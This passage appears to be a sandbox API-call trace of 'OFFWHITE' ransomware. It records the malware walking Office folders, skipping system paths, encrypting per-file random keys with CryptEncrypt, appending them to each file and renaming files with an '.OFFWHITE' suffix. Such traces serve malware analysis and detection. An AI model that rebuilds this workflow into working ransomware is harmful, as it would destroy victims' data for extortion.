users\\microsoft\\office\\sharepointteamsite.ico.offwhite")) returned 1 [0144.456] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="UICaptions", cAlternateFileName="UICAPT~1")) returned 1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2=".") returned 1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2="..") returned 1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2="...") returned 1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2="windows") returned -1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2="$recycle.bin") returned 1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2="rsa") returned 1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2="ntuser.dat") returned 1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2="programdata") returned 1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2="appdata") returned 1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2="program files") returned 1 [0144.456] lstrcmpiW (lpString1="UICaptions", lpString2="program files (x86)") returned 1 [0144.456] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\" [0144.457] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\", lpString2="UICaptions" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions" [0144.457] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\" [0144.457] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\" [0144.457] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\*.*") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\*.*" [0144.457] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0xdfea7b52, cFileName=".", cAlternateFileName="")) returned 0x544590 [0144.458] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.458] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0xdfea7b52, cFileName="..", cAlternateFileName="")) returned 1 [0144.458] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.458] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.458] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0xdfea7b52, cFileName="1036", cAlternateFileName="")) returned 1 [0144.458] lstrcmpiW (lpString1="1036", lpString2=".") returned 1 [0144.458] lstrcmpiW (lpString1="1036", lpString2="..") returned 1 [0144.458] lstrcmpiW (lpString1="1036", lpString2="...") returned 1 [0144.458] lstrcmpiW (lpString1="1036", lpString2="windows") returned -1 [0144.458] lstrcmpiW (lpString1="1036", lpString2="$recycle.bin") returned 1 [0144.458] lstrcmpiW (lpString1="1036", lpString2="rsa") returned -1 [0144.458] lstrcmpiW (lpString1="1036", lpString2="ntuser.dat") returned -1 [0144.458] lstrcmpiW (lpString1="1036", lpString2="programdata") returned -1 [0144.458] lstrcmpiW (lpString1="1036", lpString2="appdata") returned -1 [0144.458] lstrcmpiW (lpString1="1036", lpString2="program files") returned -1 [0144.458] lstrcmpiW (lpString1="1036", lpString2="program files (x86)") returned -1 [0144.458] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\" [0144.458] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\", lpString2="1036" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036" [0144.459] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.459] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.459] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\*.*") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\*.*" [0144.459] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0144.463] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.463] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0144.467] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.467] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.467] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2=".") returned 1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="..") returned 1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="...") returned 1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="windows") returned -1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="rsa") returned -1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="programdata") returned -1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="appdata") returned 1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="program files") returned -1 [0144.468] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0144.468] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.468] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="ENVELOPR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" [0144.468] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.468] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.468] PathFindExtensionW (pszPath="ENVELOPR.DLL.trx_dll") returned=".trx_dll" [0144.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.468] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.469] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.469] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.469] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.469] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.469] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.469] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.469] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.469] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.469] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.469] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.469] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.469] GetProcessHeap () returned 0x500000 [0144.469] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ea10 [0144.469] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.470] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=14688) returned 1 [0144.470] GetProcessHeap () returned 0x500000 [0144.470] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.470] GetProcessHeap () returned 0x500000 [0144.470] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.470] GetProcessHeap () returned 0x500000 [0144.470] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.470] GetProcessHeap () returned 0x500000 [0144.470] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.470] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.470] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.470] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.470] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.470] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.470] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.470] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.470] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.470] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.470] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.471] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.471] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.471] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.471] SetLastError (dwErrCode=0x0) [0144.471] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.474] GetLastError () returned 0x0 [0144.474] GetLastError () returned 0x0 [0144.474] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.474] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.475] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.475] WriteFile (in: hFile=0x218, lpBuffer=0x52ea10*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ea10*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.475] GetProcessHeap () returned 0x500000 [0144.475] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3960) returned 0x5607c8 [0144.475] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.475] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x3960, lpOverlapped=0x0) returned 1 [0144.478] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.478] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x3960, lpOverlapped=0x0) returned 1 [0144.478] GetProcessHeap () returned 0x500000 [0144.478] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.478] CloseHandle (hObject=0x218) returned 1 [0144.478] GetProcessHeap () returned 0x500000 [0144.478] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.478] GetProcessHeap () returned 0x500000 [0144.478] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.478] GetProcessHeap () returned 0x500000 [0144.478] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.478] GetProcessHeap () returned 0x500000 [0144.478] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.478] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" [0144.478] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.OFFWHITE" [0144.478] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll.offwhite")) returned 1 [0144.480] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd48e100, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbd48e100, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xbf60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".") returned 1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="..") returned 1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="...") returned 1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="windows") returned -1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="rsa") returned -1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="programdata") returned -1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="appdata") returned 1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="program files") returned -1 [0144.480] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0144.480] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.480] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="GRINTL32.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" [0144.480] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.480] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.480] PathFindExtensionW (pszPath="GRINTL32.DLL.trx_dll") returned=".trx_dll" [0144.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.481] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.481] GetProcessHeap () returned 0x500000 [0144.481] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ea20 [0144.481] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.482] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=48992) returned 1 [0144.482] GetProcessHeap () returned 0x500000 [0144.482] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.482] GetProcessHeap () returned 0x500000 [0144.482] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.482] GetProcessHeap () returned 0x500000 [0144.482] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.482] GetProcessHeap () returned 0x500000 [0144.482] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.482] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.482] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.482] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.482] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.483] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.483] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.483] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.483] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.483] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.483] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.483] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.483] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.483] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xbf60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.483] SetLastError (dwErrCode=0x0) [0144.483] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.485] GetLastError () returned 0x0 [0144.485] GetLastError () returned 0x0 [0144.485] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xc060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.485] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.486] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xc160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.486] WriteFile (in: hFile=0x218, lpBuffer=0x52ea20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ea20*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.486] GetProcessHeap () returned 0x500000 [0144.486] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xbf60) returned 0x5607c8 [0144.486] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | 